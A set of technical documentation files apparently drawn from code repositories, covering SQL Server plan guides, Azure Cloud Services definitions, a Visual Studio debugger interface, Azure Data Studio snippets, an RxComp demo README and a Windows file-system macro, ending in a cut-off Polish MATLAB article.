masashimi/sql-docs.ja-jp
8d7b348348f377b8b1621da72311554cfd003fae
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: パラメーター化クエリのプラン ガイドの作成 | Microsoft Docs ms.custom: '' ms.date: 03/14/2017 ms.prod: sql ms.reviewer: '' ms.suite: sql ms.technology: performance ms.tgt_pltfrm: '' ms.topic: conceptual helpviewer_keywords: - parameterized queries, plan guides for - plan guides [SQL Server], parameterized queries ms.assetid: b532ae16-66e7-4641-9bc8-b0d805853477 caps.latest.revision: 6 author: MikeRayMSFT ms.author: mikeray manager: craigg ms.openlocfilehash: 5b45a9adec50b1abc3c20b4d2ad56641db1d832f ms.sourcegitcommit: ee661730fb695774b9c483c3dd0a6c314e17ddf8 ms.translationtype: HT ms.contentlocale: ja-JP ms.lasthandoff: 05/19/2018 --- # <a name="create-a-plan-guide-for-parameterized-queries"></a>パラメーター化クエリのプラン ガイドの作成 [!INCLUDE[appliesto-ss-xxxx-xxxx-xxx-md](../../includes/appliesto-ss-xxxx-xxxx-xxx-md.md)] TEMPLATE プラン ガイドでは、指定した形式にパラメーター化されたスタンドアロン クエリが照合されます。 次の例では、指定されたフォームにパラメーター化されるクエリに適合するプラン ガイドを作成し、 [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] に対してクエリのパラメーター化を強制的に実行させます。 次の 2 つのクエリは構文的には同じですが、定数リテラル値のみが異なります。 ``` SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d ON h.SalesOrderID = d.SalesOrderID WHERE h.SalesOrderID = 45639; SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d ON h.SalesOrderID = d.SalesOrderID WHERE h.SalesOrderID = 45640; ``` パラメーター化形式のクエリに対するプラン ガイドは次のようになります。 ``` EXEC sp_create_plan_guide @name = N'TemplateGuide1', @stmt = N'SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d ON h.SalesOrderID = d.SalesOrderID WHERE h.SalesOrderID = @0', @type = N'TEMPLATE', @module_or_batch = NULL, @params = N'@0 int', @hints = N'OPTION(PARAMETERIZATION FORCED)'; ``` この例では、 `@stmt` パラメーターの値は、パラメーター化形式のクエリになっています。 この値を取得して sp_create_plan_guide で使用できるようにするには、 [sp_get_query_template](../../relational-databases/system-stored-procedures/sp-get-query-template-transact-sql.md) システム ストアド プロシージャを使用するのが唯一信頼できる方法です。 次のスクリプトを使用すると、パラメーター化クエリを取得してそのクエリに対してプラン ガイドを作成することができます。 ``` DECLARE @stmt nvarchar(max); DECLARE @params nvarchar(max); EXEC sp_get_query_template N'SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d ON h.SalesOrderID = d.SalesOrderID WHERE h.SalesOrderID = 45639;', @stmt OUTPUT, @params OUTPUT EXEC sp_create_plan_guide N'TemplateGuide1', @stmt, N'TEMPLATE', NULL, @params, N'OPTION(PARAMETERIZATION FORCED)'; ``` > [!IMPORTANT] > `@stmt` に渡される `sp_get_query_template` パラメーターの定数リテラルの値は、リテラルを置き換えるパラメーターで選択されるデータ型に影響する場合があります。 この値は、プラン ガイドの適合にも影響します。 場合によっては、異なるパラメーター値範囲に対応する複数のプラン ガイドを作成する必要があります。 TEMPLATE プラン ガイドを SQL プラン ガイドと併用することもできます。 たとえば、TEMPLATE プラン ガイドを作成することで、特定のクラスのクエリについて確実にパラメーター化を行うことができます。 これにより、そのパラメーター化された形式のクエリに対して SQL プラン ガイドを作成できます。
37.904762
304
0.736495
yue_Hant
0.922334
538d7cfb53e396fa447c93688c69b7dc2dc6d6c6
3,939
md
Markdown
articles/cloud-services/schema-csdef-file.md
koudaiii/azure-docs.ja-jp
60402401bd4bd5863ea720c3aeb9f3271d1cda53
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cloud-services/schema-csdef-file.md
koudaiii/azure-docs.ja-jp
60402401bd4bd5863ea720c3aeb9f3271d1cda53
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cloud-services/schema-csdef-file.md
koudaiii/azure-docs.ja-jp
60402401bd4bd5863ea720c3aeb9f3271d1cda53
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Azure Cloud Services (クラシック) 定義スキーマ (.csdef ファイル) | Microsoft Docs description: サービス定義 (.csdef) ファイルは、サービスの利用可能なロール、エンドポイント、および構成値を含む、アプリケーションのサービス モデルを定義します。 ms.topic: article ms.service: cloud-services ms.date: 10/14/2020 ms.author: tagore author: tanmaygore ms.reviewer: mimckitt ms.custom: '' ms.openlocfilehash: de81b6ffb5b4dc944f3d538a116383d06145661b ms.sourcegitcommit: 6272bc01d8bdb833d43c56375bab1841a9c380a5 ms.translationtype: HT ms.contentlocale: ja-JP ms.lasthandoff: 01/23/2021 ms.locfileid: "98739803" --- # <a name="azure-cloud-services-classic-definition-schema-csdef-file"></a>Azure Cloud Services (クラシック) 定義スキーマ (.csdef ファイル) > [!IMPORTANT] > [Azure Cloud Services (延長サポート)](../cloud-services-extended-support/overview.md) は、Azure Cloud Services 製品向けの新しい Azure Resource Manager ベースのデプロイ モデルです。 この変更により、Azure Service Manager ベースのデプロイ モデルで実行されている Azure Cloud Services は Cloud Services (クラシック) という名前に変更されました。そのため、すべての新しいデプロイでは [Cloud Services (延長サポート)](../cloud-services-extended-support/overview.md) を使用する必要があります。 サービス定義ファイルは、アプリケーションのサービス モデルを定義します。 このファイルには、クラウド サービスで使用できるロールの定義が含まれ、サービス エンドポイントの指定やサービスの構成設定の確立を行います。 構成設定の値は、[クラウド サービス (クラシック) 構成スキーマ](/previous-versions/azure/reference/ee758710(v=azure.100))に関するページの説明に従って、サービス構成ファイルで設定されます。 既定では、Azure Diagnostics 構成スキーマ ファイルは `C:\Program Files\Microsoft SDKs\Windows Azure\.NET SDK\<version>\schemas` ディレクトリにインストールされます。 `<version>` は、インストールされている [Azure SDK](https://www.windowsazure.com/develop/downloads/) バージョンで置き換えてください。 サービス定義ファイルの既定の拡張子は .csdef です。 ## <a name="basic-service-definition-schema"></a>基本サービス定義スキーマ サービス定義ファイルには、`ServiceDefinition` 要素を 1 つ含める必要があります。 サービス定義には、ロール (`WebRole` または `WorkerRole`) 要素を少なくとも 1 つ含める必要があります。 また、単一の定義に定義された最大 25 のロールを含めることができ、ロールの種類を混在させることができます。 サービス定義には、省略可能な `NetworkTrafficRules` 要素も含まれます。この要素は、指定した内部エンドポイントと通信できるロールを制限します。 また、省略可能な `LoadBalancerProbes` 要素も含まれます。この要素には、顧客が定義した、エンドポイントの正常性プローブが含まれます。 サービス定義ファイルの基本形式は次のとおりです。 ```xml <ServiceDefinition name="<service-name>" topologyChangeDiscovery="<change-type>" xmlns="http://schemas.microsoft.com/ServiceHosting/2008/10/ServiceDefinition" upgradeDomainCount="<number-of-upgrade-domains>" schemaVersion="<version>"> <LoadBalancerProbes> … </LoadBalancerProbes> <WebRole …> … </WebRole> <WorkerRole …> … </WorkerRole> <NetworkTrafficRules> … </NetworkTrafficRules> </ServiceDefinition> ``` ## <a name="schema-definitions"></a>スキーマ定義 以下のトピックでは、スキーマについて説明されています。 - [LoadBalancerProbe スキーマ](schema-csdef-loadbalancerprobe.md) - [WebRole スキーマ](schema-csdef-webrole.md) - [WorkerRole スキーマ](schema-csdef-workerrole.md) - [NetworkTrafficRules スキーマ](schema-csdef-networktrafficrules.md) ## <a name="servicedefinition-element"></a><a name="ServiceDefinition"></a> ServiceDefinition 要素 `ServiceDefinition` 要素は、サービス定義ファイルの最上位の要素です。 以下の表に、`ServiceDefinition` 要素の属性を示します。 | 属性 | 説明 | | ----------------------- | ----------- | | name |必須。 サービスの名前。 サービス アカウント内で一意となる名前を使用してください。| | topologyChangeDiscovery | 省略可能。 トポロジの変更通知の種類を指定します。 指定できる値は次のとおりです。<br /><br /> - `Blast` - 更新プログラムをすべてのロール インスタンスにできるだけ早く送信します。 オプションを選択する場合、ロールでは、再起動せずにトポロジの更新プログラムを処理できる必要があります。<br />- `UpgradeDomainWalk` – 前のロール インスタンスが更新プログラムを正常に受け入れた後に、更新プログラムを各インスタンスに順次送信します。| | schemaVersion | 省略可能。 サービス定義スキーマのバージョンを指定します。 複数のバージョンの SDK が一緒にインストールされている場合、Visual Studio では、スキーマ バージョンにより、スキーマの検証に使用する適切な SDK ツールを選択できます。| | upgradeDomainCount | 省略可能。 このサービスのロールが割り当てられるアップグレード ドメインの数を指定します。 そのサービスをデプロイすると、ロール インスタンスがアップグレード ドメインに割り当てられます。 詳しくは、「[クラウド サービス ロールまたはデプロイを更新する](cloud-services-how-to-manage-portal.md#update-a-cloud-service-role-or-deployment)」、[仮想マシンの可用性の管理](../virtual-machines/manage-availability.md)に関する記事、[クラウド サービス モデルの概要](./cloud-services-model-and-package.md)に関する記事をご覧ください。<br /><br /> アップグレード ドメインを最大 20 まで指定できます。 指定しない場合、アップグレード ドメインの既定の数は 5 です。|
53.22973
451
0.772531
yue_Hant
0.757457
538e14d99934a0a4bd206fb1ce9ad8fa55bc200e
2,570
md
Markdown
docs/vs-2015/extensibility/debugger/reference/idebugbreakpointunboundevent2-getreason.md
mairaw/visualstudio-docs.pt-br
26480481c1cdab3e77218755148d09daec1b3454
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/vs-2015/extensibility/debugger/reference/idebugbreakpointunboundevent2-getreason.md
mairaw/visualstudio-docs.pt-br
26480481c1cdab3e77218755148d09daec1b3454
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/vs-2015/extensibility/debugger/reference/idebugbreakpointunboundevent2-getreason.md
mairaw/visualstudio-docs.pt-br
26480481c1cdab3e77218755148d09daec1b3454
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: IDebugBreakpointUnboundEvent2::GetReason | Microsoft Docs ms.custom: '' ms.date: 11/15/2016 ms.prod: visual-studio-dev14 ms.reviewer: '' ms.suite: '' ms.technology: - vs-ide-sdk ms.tgt_pltfrm: '' ms.topic: article f1_keywords: - IDebugBreakpointUnboundEvent2::GetReason helpviewer_keywords: - IDebugBreakpointUnboundEvent2::GetReason ms.assetid: 0f8a4fec-d3eb-417d-8516-4f7b51904033 caps.latest.revision: 13 ms.author: gregvanl manager: ghogen ms.openlocfilehash: 4360baeb03847df22b7eff4e5ffdc4fa1eed3e67 ms.sourcegitcommit: af428c7ccd007e668ec0dd8697c88fc5d8bca1e2 ms.translationtype: MT ms.contentlocale: pt-BR ms.lasthandoff: 11/16/2018 ms.locfileid: "51797631" --- # <a name="idebugbreakpointunboundevent2getreason"></a>IDebugBreakpointUnboundEvent2::GetReason [!INCLUDE[vs2017banner](../../../includes/vs2017banner.md)] Obtém o motivo pelo qual que o ponto de interrupção foi desassociado. ## <a name="syntax"></a>Sintaxe ```cpp# HRESULT GetReason(  BP_UNBOUND_REASON* pdwUnboundReason ); ``` ```csharp int GetReason(  out enum_ BP_UNBOUND_REASON pdwUnboundReason ); ``` #### <a name="parameters"></a>Parâmetros `pdwUnboundReason` [out] Retorna um valor da [BP_UNBOUND_REASON](../../../extensibility/debugger/reference/bp-unbound-reason.md) enumeração que especifica o motivo pelo qual o ponto de interrupção foi desassociado. ## <a name="return-value"></a>Valor de retorno Se for bem-sucedido, retornará `S_OK`; caso contrário, retorna um código de erro. ## <a name="remarks"></a>Comentários Os motivos incluem um ponto de interrupção que está sendo religado para um local diferente após uma operação de editar e continuar, ou a uma determinação de que um ponto de interrupção foi vinculado em erro. ## <a name="example"></a>Exemplo O exemplo a seguir mostra como implementar esse método para um **CBreakpointUnboundDebugEventBase** objeto que expõe a [IDebugBreakpointUnboundEvent2](../../../extensibility/debugger/reference/idebugbreakpointunboundevent2.md) interface. ```cpp# STDMETHODIMP CBreakpointUnboundDebugEventBase::GetReason( BP_UNBOUND_REASON* pdwUnboundReason) { HRESULT hRes = E_FAIL; if ( EVAL(pdwUnboundReason) ) { *pdwUnboundReason = m_dwReason; hRes = S_OK; } else hRes = E_INVALIDARG; return ( hRes ); } ``` ## <a name="see-also"></a>Consulte também [IDebugBreakpointUnboundEvent2](../../../extensibility/debugger/reference/idebugbreakpointunboundevent2.md)
31.728395
240
0.729183
por_Latn
0.560909
538e99a973fc2b7a38c4179ffd3a3e2bfcc55766
6,061
md
Markdown
windows-driver-docs-pr/ifs/fsrtlexitfilesystem.md
josephpracharmsft/windows-driver-docs
1aade029928ee88429924a993047b7725246c352
[ "CC-BY-4.0", "MIT" ]
1
2020-02-26T02:51:21.000Z
2020-02-26T02:51:21.000Z
windows-driver-docs-pr/ifs/fsrtlexitfilesystem.md
josephpracharmsft/windows-driver-docs
1aade029928ee88429924a993047b7725246c352
[ "CC-BY-4.0", "MIT" ]
1
2021-01-21T17:24:17.000Z
2021-01-21T17:24:17.000Z
windows-driver-docs-pr/ifs/fsrtlexitfilesystem.md
josephpracharmsft/windows-driver-docs
1aade029928ee88429924a993047b7725246c352
[ "CC-BY-4.0", "MIT" ]
2
2020-08-11T00:01:58.000Z
2021-11-24T02:51:30.000Z
--- title: FsRtlExitFileSystem function description: The FsRtlExitFileSystem macro re-enables the delivery of normal kernel-mode APCs that were disabled by a preceding call to FsRtlEnterFileSystem. ms.assetid: 763ceb1c-f614-4268-a7fe-73de0c354c71 keywords: ["FsRtlExitFileSystem function Installable File System Drivers"] topic_type: - apiref api_name: - FsRtlExitFileSystem api_location: - Ntifs.h api_type: - HeaderDef ms.date: 11/28/2017 ms.localizationpriority: medium --- # FsRtlExitFileSystem function The **FsRtlExitFileSystem** macro re-enables the delivery of normal kernel-mode APCs that were disabled by a preceding call to [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md). Syntax ------ ```ManagedCPlusPlus VOID FsRtlExitFileSystem( VOID ); ``` Parameters ---------- ** None Return value ------------ This function does not return a value. Remarks ------- Every file system driver entry point routine must call [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) immediately before acquiring a resource required in performing a file I/O request and call **FsRtlExitFileSystem** immediately afterward. This ensures that the routine cannot be suspended while running and thus block other file I/O requests. Every successful call to [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) must be matched by a subsequent call to **FsRtlExitFileSystem**. Note that, unlike local file systems and network redirectors, file system filter drivers should never disable delivery of normal kernel APCs (by calling [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) or [**KeEnterCriticalRegion**](https://docs.microsoft.com/windows-hardware/drivers/ddi/ntddk/nf-ntddk-keentercriticalregion) or by raising to IRQL APC\_LEVEL) across a call to [**IoCallDriver**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-iocalldriver). The only time when a file system filter driver should disable normal kernel APCs is immediately before calling [**ExAcquireResourceExclusive**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl), [**ExAcquireResourceExclusiveLite**](https://msdn.microsoft.com/library/windows/hardware/ff544351), [**ExAcquireResourceShared**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl), [**ExAcquireResourceSharedLite**](https://msdn.microsoft.com/library/windows/hardware/ff544363), or [**ExAcquireSharedStarveExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544367). After calling [**ExReleaseResource**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) or [**ExReleaseResourceLite**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-exreleaseresourcelite), the filter driver should immediately re-enable delivery of normal kernel APCs. As an alternative to [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md), minifilter drivers can use the [**FltAcquireResourceExclusive**](fltacquireresourceexclusive.md), [**FltAcquireResourceShared**](fltacquireresourceshared.md), and [**FltReleaseResource**](fltreleaseresource.md) routines which properly handles APCs when acquiring and releasing a resource. It is not necessary to disable normal kernel APCs before calling [**ExAcquireSharedWaitForExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544370) because this routine calls [**KeRaiseIrqlToDpcLevel**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-keraiseirqltodpclevel), which disables both normal and special kernel APCs. It is also not necessary to do so before calling [**ExAcquireFastMutex**](https://docs.microsoft.com/previous-versions/windows/hardware/drivers/ff544337(v=vs.85)) or [**ExAcquireResourceExclusive**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl), because these routines disable normal kernel APCs. Requirements ------------ <table> <colgroup> <col width="50%" /> <col width="50%" /> </colgroup> <tbody> <tr class="odd"> <td align="left"><p>Target platform</p></td> <td align="left">Desktop</td> </tr> <tr class="even"> <td align="left"><p>Header</p></td> <td align="left">Ntifs.h (include Ntifs.h)</td> </tr> <tr class="odd"> <td align="left"><p>IRQL</p></td> <td align="left"><p>&lt;= APC_LEVEL</p></td> </tr> </tbody> </table> ## See also [**ExAcquireFastMutex**](https://docs.microsoft.com/previous-versions/windows/hardware/drivers/ff544337(v=vs.85)) [**ExAcquireResourceExclusive**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) [**ExAcquireResourceExclusiveLite**](https://msdn.microsoft.com/library/windows/hardware/ff544351) [**ExAcquireResourceShared**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) [**ExAcquireResourceSharedLite**](https://msdn.microsoft.com/library/windows/hardware/ff544363) [**ExAcquireSharedWaitForExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544370) [**ExAcquireSharedStarveExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544367) [**ExReleaseResource**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) [**ExReleaseResourceLite**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-exreleaseresourcelite) [**ExTryToAcquireFastMutex**](https://docs.microsoft.com/previous-versions/windows/hardware/drivers/ff545647(v=vs.85)) [**FltAcquireResourceExclusive**](fltacquireresourceexclusive.md) [**FltAcquireResourceShared**](fltacquireresourceshared.md) [**FltReleaseResource**](fltreleaseresource.md) [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) [**IoCallDriver**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-iocalldriver) [**KeLeaveCriticalRegion**](https://docs.microsoft.com/windows-hardware/drivers/ddi/ntddk/nf-ntddk-keleavecriticalregion) [**KeRaiseIrqlToDpcLevel**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-keraiseirqltodpclevel)
48.103175
1,294
0.766375
eng_Latn
0.373853
538ea9bfe7b0e7c1cf1ae2768805c7ac9a0d0e9e
126
md
Markdown
assets/defold-api-emmylua.md
aglitchman/defold.github.io
ca0c499df9686bdbc8a619f28845856a28ba746d
[ "Apache-2.0" ]
null
null
null
assets/defold-api-emmylua.md
aglitchman/defold.github.io
ca0c499df9686bdbc8a619f28845856a28ba746d
[ "Apache-2.0" ]
null
null
null
assets/defold-api-emmylua.md
aglitchman/defold.github.io
ca0c499df9686bdbc8a619f28845856a28ba746d
[ "Apache-2.0" ]
null
null
null
--- layout: asset asset: defold-api-emmylua title: IntelliJ Defold API description: Defold api headers for emmylua plugin ---
18
50
0.769841
eng_Latn
0.617823
538f22cf3dfae3b9a597ab46eb299500886567cb
3,158
md
Markdown
docs/azure-data-studio/code-snippets.md
marcustung/sql-docs.zh-tw
f64ee32984b48f6607d66d80450d51c2b2b6531d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/azure-data-studio/code-snippets.md
marcustung/sql-docs.zh-tw
f64ee32984b48f6607d66d80450d51c2b2b6531d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/azure-data-studio/code-snippets.md
marcustung/sql-docs.zh-tw
f64ee32984b48f6607d66d80450d51c2b2b6531d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: 建立可重複使用的程式碼片段 titleSuffix: Azure Data Studio description: 了解如何建立和使用 Azure Data Studio 中的 SQL 程式碼片段 ms.prod: sql ms.technology: azure-data-studio ms.topic: conceptual author: markingmyname ms.author: maghan ms.reviewer: alayu; sstein ms.custom: seodec18 ms.date: 09/24/2018 ms.openlocfilehash: 09a8432d10a70bb8530654d76bce874f735788a6 ms.sourcegitcommit: b2464064c0566590e486a3aafae6d67ce2645cef ms.translationtype: MT ms.contentlocale: zh-TW ms.lasthandoff: 07/15/2019 ms.locfileid: "67959705" --- # <a name="create-and-use-code-snippets-to-quickly-create-transact-sql-t-sql-scripts-in-includename-sosincludesname-sos-shortmd"></a>透過建立與使用程式碼片段,在 [!INCLUDE[name-sos](../includes/name-sos-short.md)] 內快速地建立 TRANSACT-SQL (T-SQL) 指令碼 程式碼片段中的[!INCLUDE[name-sos](../includes/name-sos-short.md)]是範本,讓您輕鬆地建立資料庫與資料庫物件。 [!INCLUDE[name-sos](../includes/name-sos-short.md)] 提供數個的 T-SQL 程式碼片段,協助您快速產生正確的語法。 也可以建立使用者定義的程式碼片段。 ## <a name="using-built-in-t-sql-code-snippets"></a>使用內建的 T-SQL 程式碼片段 1. 若要存取可用的程式碼片段,請在查詢編輯器中輸入 *sql* 以開啟清單: ![程式碼片段](media/code-snippets/sql-snippets.png) 1. 選取您要使用的程式碼片段,並產生 T-SQL 指令碼。 例如,選取*sqlCreateTable*: ![建立資料表的程式碼片段](media/code-snippets/create-table.png) 1. 將反白顯示的欄位更新為特定值。 例如,依據您的資料庫,取代 *TableName* 和 *Schema* 值: ![取代範本欄位](media/code-snippets/table-from-snippet.png) 如果您想要變更的欄位不再反白顯示 (當您在編輯器周圍移動游標時),請以滑鼠右鍵按一下您想要變更文字,並選取**變更所有相符項目**: ![取代範本欄位](media/code-snippets/change-all.png) 1. 針對選取的程式碼片段,依據您的需求更新或加入任何額外 T-SQL。 例如,更新 *Column1*、*Column2*,並加入更多的資料欄位。 ## <a name="creating-sql-code-snippets"></a>建立 SQL 程式碼片段 您可以定義您自己的程式碼片段。 開啟 SQL 程式碼片段檔案進行編輯: 1. 開啟*命令選擇區*(**Shift + Ctrl + P**),然後輸入*剪取*,然後選取**喜好設定:開啟使用者程式碼片段**: ![取代範本欄位](media/code-snippets/user-snippets.png) 1. 選取 **SQL**: > [!NOTE] > [!INCLUDE[name-sos](../includes/name-sos-short.md)] 從 Visual Studio Code 繼承其程式碼片段的功能,因此這份文件特別說明如何使用 SQL 程式碼片段。 如需詳細資訊,請參閱 Visual Studio 程式碼文件中的[建立您自己的程式碼片段](https://code.visualstudio.com/docs/editor/userdefinedsnippets)。 ![取代範本欄位](media/code-snippets/select-sql.png) 1. 貼上下列程式碼插入*sql.json*: ```sql { "Select top 5": { "prefix": "sqlSelectTop5", "body": "SELECT TOP 5 * FROM ${1:TableName}", "description": "User-defined snippet example 1" }, "Create Table snippet":{ "prefix": "sqlCreateTable2", "body": [ "-- Create a new table called '${1:TableName}' in schema '${2:SchemaName}'", "-- Drop the table if it already exists", "IF OBJECT_ID('$2.$1', 'U') IS NOT NULL", "DROP TABLE $2.$1", "GO", "-- Create the table in the specified schema", "CREATE TABLE $2.$1", "(", " $1Id INT NOT NULL PRIMARY KEY, -- primary key column", " Column1 [NVARCHAR](50) NOT NULL,", " Column2 [NVARCHAR](50) NOT NULL", " -- specify more columns here", ");", "GO" ], "description": "User-defined snippet example 2" } } ``` 1. 儲存 sql.json 檔案。 1. 透過按一下 **Ctrl + N** 以開啟新的 [查詢編輯器] 視窗。 2. 輸入 **sql**,然後您會看到您剛加入的兩個使用者程式碼片段:*sqlCreateTable2* 和 *sqlSelectTop5*。 選取其中一個新的程式碼片段,並進行測試 ! ## <a name="additional-resources"></a>其他資源 SQL 編輯器的相關資訊,請參閱[教學課程中的程式碼編輯器](tutorial-sql-editor.md)。
29.514019
231
0.693477
yue_Hant
0.70269
5390a316f2c1e62df95d4e9daaa173e10acf10b4
633
md
Markdown
gutils/README.md
gravypod/p4-constraints
3c02ca5750acf9af814cc12b4ad0547d452ed831
[ "Apache-2.0" ]
null
null
null
gutils/README.md
gravypod/p4-constraints
3c02ca5750acf9af814cc12b4ad0547d452ed831
[ "Apache-2.0" ]
null
null
null
gutils/README.md
gravypod/p4-constraints
3c02ca5750acf9af814cc12b4ad0547d452ed831
[ "Apache-2.0" ]
null
null
null
# Utilities These libraries provide basic functions used throughout the code base. The files in this directory are copied/adapted from the following repositories: * https://github.com/google/mediapipe * https://github.com/google/iree * https://github.com/google/nucleus The files from these repositories are, respectively: Copyright 2019 The MediaPipe Authors Copyright 2018 Google LLC Copyright 2019 Google LLC All code in this directory should eventually make it's way into the libraries Abseil, Googletest, and Protocol Buffers; we should thus be able to gradually shrink and eventually eliminate this directory.
33.315789
79
0.796209
eng_Latn
0.975415
5390c9a3626db321eda0b76d9ab10aa4ff696fc7
98
md
Markdown
api/indicators/13-1-0.md
PiotrWalaszczak/sdg-indicators-pl
2518a2054a2920c08a1212c11f7eb0718c5ad6b6
[ "CC0-1.0" ]
null
null
null
api/indicators/13-1-0.md
PiotrWalaszczak/sdg-indicators-pl
2518a2054a2920c08a1212c11f7eb0718c5ad6b6
[ "CC0-1.0" ]
null
null
null
api/indicators/13-1-0.md
PiotrWalaszczak/sdg-indicators-pl
2518a2054a2920c08a1212c11f7eb0718c5ad6b6
[ "CC0-1.0" ]
null
null
null
--- permalink: /api/13-1-0.json sdg_goal: 13 layout: json_indicator indicator: "13.1.0" ---
14
28
0.642857
hun_Latn
0.168318
539141c5cb460283ca26ddf7dfbe3fc992775772
2,301
md
Markdown
README.md
actarian/rxcomp-todomvc
c3d3c8d19a2b3cc9186544772aaa3515594ccaaf
[ "MIT" ]
null
null
null
README.md
actarian/rxcomp-todomvc
c3d3c8d19a2b3cc9186544772aaa3515594ccaaf
[ "MIT" ]
1
2020-05-08T08:06:32.000Z
2020-05-08T08:06:32.000Z
README.md
actarian/rxcomp-todomvc
c3d3c8d19a2b3cc9186544772aaa3515594ccaaf
[ "MIT" ]
null
null
null
# 💎 TodoMvc RxComp demo [![Licence](https://img.shields.io/github/license/actarian/rxcomp-todomvc.svg)](https://github.com/actarian/rxcomp-todomvc) This is a demo app of the [RxComp](https://github.com/actarian/rxcomp) reactive component library. Built on top of [RxJs](https://github.com/ReactiveX/rxjs) it mimics the [Angular](https://angular.io/) declarative syntax. If you like Angular declarative syntax but you just want go Vanilla, RxComp library come in useful. > [TodoMvc Demo](https://actarian.github.io/rxcomp-todomvc/) > [TodoMvc Codepen](https://codepen.io/actarian/pen/QWWRZON?editors=0010) > [RxComp Github Project](https://github.com/actarian/rxcomp) ___ ### Install packages ``` npm install ``` ___ ### Build, Serve & Watch ``` gulp ``` ___ ### Dependancies ```json "rxcomp": "1.0.0-beta.9", "rxjs": "~6.5.4", ``` ### CDN ```html <script src="https://unpkg.com/@reactivex/[email protected]/dist/global/rxjs.umd.min.js"></script> <script src="https://unpkg.com/[email protected]/dist/rxcomp.min.js"></script> ``` ## Contributing ___ *Pull requests are welcome and please submit bugs 🐞* *Thank you for taking the time to provide feedback and review. This feedback is appreciated and very helpful 🌈* [![GitHub forks](https://img.shields.io/github/forks/actarian/rxcomp.svg?style=social&label=Fork&maxAge=2592000)](https://gitHub.com/actarian/rxcomp/network/) [![GitHub stars](https://img.shields.io/github/stars/actarian/rxcomp.svg?style=social&label=Star&maxAge=2592000)](https://GitHub.com/actarian/rxcomp/stargazers/) [![GitHub followers](https://img.shields.io/github/followers/actarian.svg?style=social&label=Follow&maxAge=2592000)](https://github.com/actarian?tab=followers) * [Github Project Page](https://github.com/actarian/rxcomp) *If you find it helpful, feel free to contribute in keeping this library up to date via [PayPal](https://www.paypal.me/circledev/5)* [![PayPal](https://www.paypalobjects.com/webstatic/en_US/i/buttons/PP_logo_h_100x26.png)](https://www.paypal.me/circledev/5) ___ ## Contact * Luca Zampetti <[email protected]> * Follow [@actarian](https://twitter.com/actarian) on Twitter [![Twitter Follow](https://img.shields.io/twitter/follow/actarian.svg?style=social&label=Follow%20@actarian)](https://twitter.com/actarian) ___
35.4
482
0.736636
eng_Latn
0.273263
53916b61918035b97b5bb676168665c00c7d24ee
8,082
md
Markdown
articles/virtual-machines/windows/matlab-mdcs-cluster.md
changeworld/azure-docs.pl-pl
f97283ce868106fdb5236557ef827e56b43d803e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/virtual-machines/windows/matlab-mdcs-cluster.md
changeworld/azure-docs.pl-pl
f97283ce868106fdb5236557ef827e56b43d803e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/virtual-machines/windows/matlab-mdcs-cluster.md
changeworld/azure-docs.pl-pl
f97283ce868106fdb5236557ef827e56b43d803e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Klastry MATLAB na maszynach wirtualnych description: Używanie maszyn wirtualnych platformy Microsoft Azure do tworzenia klastrów rozproszonego serwera obliczeniowego MATLAB w celu uruchamiania równoległych obciążeń MATLAB intensywnie korzystających z mocy obliczeniowej services: virtual-machines-windows documentationcenter: '' author: mscurrell manager: gwallace editor: '' ms.assetid: e9980ce9-124a-41f1-b9ec-f444c8ea5c72 ms.service: virtual-machines-windows ms.topic: article ms.tgt_pltfrm: Windows ms.workload: infrastructure-services ms.date: 05/09/2016 ms.author: markscu ms.openlocfilehash: a2fb2479f5544b869b51e796085fcb4d0b76121a ms.sourcegitcommit: 2ec4b3d0bad7dc0071400c2a2264399e4fe34897 ms.translationtype: MT ms.contentlocale: pl-PL ms.lasthandoff: 03/27/2020 ms.locfileid: "74038142" --- # <a name="create-matlab-distributed-computing-server-clusters-on-azure-vms"></a>Tworzenie klastrów serwerów przetwarzania rozproszonego MATLAB na maszynach wirtualnych platformy Azure Maszyny wirtualne platformy 